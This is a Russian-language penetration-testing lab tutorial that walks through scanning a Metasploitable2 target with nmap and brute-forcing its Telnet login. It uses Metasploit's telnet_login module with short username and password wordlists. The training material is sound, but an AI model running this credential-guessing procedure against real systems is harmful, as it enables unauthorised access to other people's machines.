Введение
В этой лабораторной работе мы научимся эксплуатировать уязвимость службы Telnet и выполнять атаку на проникновение. Сценарий предполагает использование Kali Linux в качестве атакующей машины и виртуальной машины Metasploitable2 в качестве целевой. Цель состоит в том, чтобы просканировать целевую машину на наличие уязвимостей, выявить уязвимость службы Telnet и использовать ее с помощью фреймворка Metasploit.
Запуск лабораторной среды
На этом этапе мы запустим лабораторную среду, которая включает контейнер Kali Linux и виртуальную машину Metasploitable2.
- Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2
Дождитесь запуска целевой машины, это может занять 1-3 минуты.
- Проверьте соединение с целевой машиной с помощью команды ping:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
- Запустите контейнер Kali Linux и войдите в среду bash, выполнив:
docker run -ti --network host b5b709a49cd5 bash
- Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
Теперь и атакующая, и целевая машины запущены, и вы можете начать тестирование на проникновение.
Примечание: Если вы случайно выйдете из текущего bash, контейнер Kali автоматически остановится. Вы можете снова выполнить docker run -ti --network host b5b709a49cd5 bash на хосте, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
Выполнение сканирования уязвимостей
На этом этапе мы будем использовать Nmap для сканирования целевой машины на наличие открытых портов и служб.
Сначала запустите базу данных PostgreSQL, так как она необходима Metasploit для хранения данных:
service postgresql start
msfdb init
cd ~
msfconsole
В консоли Metasploit запустите сканирование Nmap для целевой машины:
nmap -sV -T4 192.168.122.102
Опция -sV сканирует открытые порты и показывает подробную информацию о них, а -T4 устанавливает политику тайминга сканирования (от 0 до 5, более высокие значения работают быстрее, но более заметны).
Анализ результатов сканирования
На этом этапе мы проанализируем результаты сканирования Nmap, чтобы выявить уязвимую службу Telnet.
Результаты сканирования Nmap показывают, что служба Telnet работает на порту 23 с баннером "Linux telnetd". Давайте найдем соответствующий модуль Metasploit:
search scanner/telnet
Используйте модуль auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Покажите параметры модуля:
show options
Обязательным параметром является RHOSTS, который указывает целевой хост(ы).
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Подготовка словаря имен пользователей и паролей
На этом этапе мы подготовим файлы словарей имен пользователей и паролей для атаки методом перебора (brute-force).
Вернитесь в оболочку контейнера Kali перед созданием файлов. Если вы все еще находитесь в msfconsole, нажмите Ctrl+D, чтобы выйти в оболочку контейнера. Ваша командная строка должна выглядеть примерно так: root@...:/#.
Создайте /username.txt со следующими именами пользователей:
cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF
Создайте /password.txt со следующими паролями:
cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF
Эти файлы будут использоваться в качестве словарей имен пользователей и паролей для атаки методом перебора.
Настройка модуля Metasploit
На этом этапе мы настроим модуль Metasploit, указав целевой хост, словарь имен пользователей и словарь паролей.
Прежде всего, если вы не находитесь в консоли Metasploit, запустите ее:
cd ~
msfconsole
Используйте модуль auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Установите целевой хост:
set RHOSTS 192.168.122.102
Установите файл словаря имен пользователей:
set USER_FILE /username.txt
Установите файл словаря паролей:
set PASS_FILE /password.txt
Наконец, запустите эксплойт:
exploit
Metasploit начнет пробовать различные комбинации имен пользователей и паролей из предоставленных словарей. Если будут найдены действительные учетные данные, они будут отображены зеленым цветом.
В данном случае действительными учетными данными являются msfadmin/msfadmin.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Резюме
В этой лабораторной работе мы узнали, как эксплуатировать уязвимость службы Telnet с помощью фреймворка Metasploit. Мы начали с настройки лабораторной среды, используя Kali Linux в качестве атакующей машины и Metasploitable2 в качестве целевой. Затем мы выполнили сканирование уязвимостей с помощью Nmap, чтобы обнаружить открытую службу Telnet. Далее мы подготовили словари имен пользователей и паролей и настроили модуль Metasploit, указав целевой хост и файлы словарей. Наконец, мы выполнили эксплойт и успешно подобрали учетные данные для входа в Telnet методом перебора.
Эта лабораторная работа предоставила практический опыт тестирования на проникновение, сканирования уязвимостей и использования фреймворка Metasploit для эксплуатации уязвимостей. Она подчеркнула важность безопасных методов работы с паролями и потенциальные риски использования слабых или легко угадываемых учетных данных.



